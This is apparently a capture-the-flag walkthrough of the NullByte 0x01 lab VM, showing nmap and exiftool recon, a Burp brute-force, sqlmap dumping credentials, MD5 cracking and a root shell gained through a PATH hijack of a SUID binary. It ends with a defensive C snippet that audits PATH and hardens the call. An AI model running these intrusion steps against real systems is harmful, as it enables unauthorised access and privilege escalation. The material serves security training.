- Recon:
$ netdiscover -r 10.0.2.1/24
10.0.2.136 00:0c:29:92:08:6b 1 60 VMware, Inc.
$ nmap -A 10.0.2.136 -p-
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Null Byte 00 - level 1
...
777/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 1024 16:30:13:d9:d5:55:36:e8:1b:b7:d9:ba:55:2f:d7:44 (DSA)
| 2048 29:aa:7d:2e:60:8b:a6:a1:c2:bd:7c:c8:bd:3c:f4:f2 (RSA)
|_ 256 60:06:e3:64:8f:8a:6f:a7:74:5a:8b:3f:e1:24:93:96 (ECDSA)
- Download the image from the web page on TCP port 80 and analyse it:
$ exiftool main.gif
...
Comment : P-): kzMb5nVYJw
...
- Browsing to http://10.0.2.136/kzMb5nVYJw/ shows a Key input field
- Brute-force it with Burp using rockyou.txt as the wordlist; the key turns out to be elite
- Once in, there is a username input field. Judging by the response to input, run sqlmap against it; this reveals the seth database
$ sqlmap -u http://10.0.2.136/kzMb5nVYJw/420search.php?usrtosearch=1 --dbs
...
[20:14:45] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 8.0 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.5
[20:14:45] [INFO] fetching database names
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] seth
- Next, enumerate the tables and columns
$ sqlmap -u http://10.0.2.136/kzMb5nVYJw/420search.php?usrtosearch=1 --dump --columns --tables -D seth
Database: seth
Table: users
[2 entries]
+----+---------------------------------------------+--------+------------+
| id | pass | user | position |
+----+---------------------------------------------+--------+------------+
| 1 | YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE | ramses | <blank> |
| 2 | --not allowed-- | isis | employee |
+----+---------------------------------------------+--------+------------+
- Cracking ramses's password: this is a Base64-encoded MD5 hash. Append the '=' padding at the end, base64-decode it, then crack the MD5; the password is omega
- Log in over SSH and look for clues:
ssh ramses@10.0.2.136 -p777
- Found in .bash_history:
cd /var/www
cd backup/
ls
./procwatch
- Analysing procwatch:
- First run procwatch; its output looks very much like ps, so the program probably runs the ps command internally (to confirm that it really executes ps, analyse it with gdb; see https://blog.techorganic.com/2015/08/06/nullbyte-0x01-hacking-challenge/)
$ ./procwatch
PID TTY TIME CMD
19664 pts/0 00:00:00 procwatch
19665 pts/0 00:00:00 sh
19666 pts/0 00:00:00 ps
- Examining the file shows that the binary has the SUID bit set, e.g. the s in -rwsr-xr-x below
$ ls -alt procwatch
-rwsr-xr-x 1 root root 4932 Aug 2 2015 procwatch
- Or the setuid marker in the output below
$ file procwatch
procwatch: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=17d666a0c940726b29feedde855535fb21cb160c, not stripped
- setuid means the process runs with its effective user temporarily switched to the file's owner, so it has the owner's privileges (https://yq.aliyun.com/articles/8875)
- In other words, assuming procwatch executes ps, if ps can be swapped for /bin/sh, then sh runs with root privileges.
- Prepend /tmp to the PATH environment variable so that ps resolves to the fake ps under /tmp, which is actually /bin/sh
cd /tmp
cp /bin/sh /tmp/ps
export PATH=/tmp:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
- Run ./procwatch again to get a root shell
$ ./procwatch
# id
uid=1002(ramses) gid=1002(ramses) euid=0(root) groups=1002(ramses)
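A defender's counterpart to the PATH hijack above, added here as an example that is not part of the original writeup: a PATH audit that flags the entries an unprivileged user could plant a fake ps in, and a hardened replacement for the system("ps") call procwatch is assumed to make (the writeup only infers that it runs ps; the function names are hypothetical and ps is assumed to live at /bin/ps).

```c
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/wait.h>

/* A PATH entry is unsafe if it is empty or relative (resolved against the
 * caller's cwd) or a world-writable directory such as /tmp, where any user
 * can plant a fake "ps". Entries that do not exist are skipped, as sh does. */
int path_entry_is_unsafe(const char *dir) {
    struct stat st;
    if (dir[0] != '/') return 1;
    if (stat(dir, &st) != 0) return 0;
    return (st.st_mode & S_IWOTH) != 0;
}

/* Audit: count the entries of a PATH string that could be used to hijack a
 * command looked up by name. Parsed by hand so empty entries are not lost. */
int count_unsafe_path_entries(const char *path) {
    int unsafe = 0;
    for (const char *p = path;;) {
        const char *colon = strchr(p, ':');
        size_t len = colon ? (size_t)(colon - p) : strlen(p);
        char dir[4096];
        if (len >= sizeof dir) len = sizeof dir - 1;
        memcpy(dir, p, len);
        dir[len] = '\0';
        unsafe += path_entry_is_unsafe(dir);
        if (!colon) break;
        p = colon + 1;
    }
    return unsafe;
}

/* Hardened replacement for system("ps") in a SUID program: no shell, an
 * absolute path, a fixed environment, and the inherited root privilege is
 * dropped first, so the caller's PATH can no longer pick which binary runs. */
int run_ps_hardened(void) {
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char *const argv[] = { (char *)"ps", NULL };
        char *const envp[] = { (char *)"PATH=/usr/bin:/bin", NULL };
        if (setuid(getuid()) != 0) _exit(126);
        execve("/bin/ps", argv, envp);
        _exit(127);          /* only reached if exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

Run against the PATH exported in the writeup, the audit flags exactly one entry (/tmp); the same check applied to the environment a SUID program inherits is what would have caught this before ./procwatch was ever run.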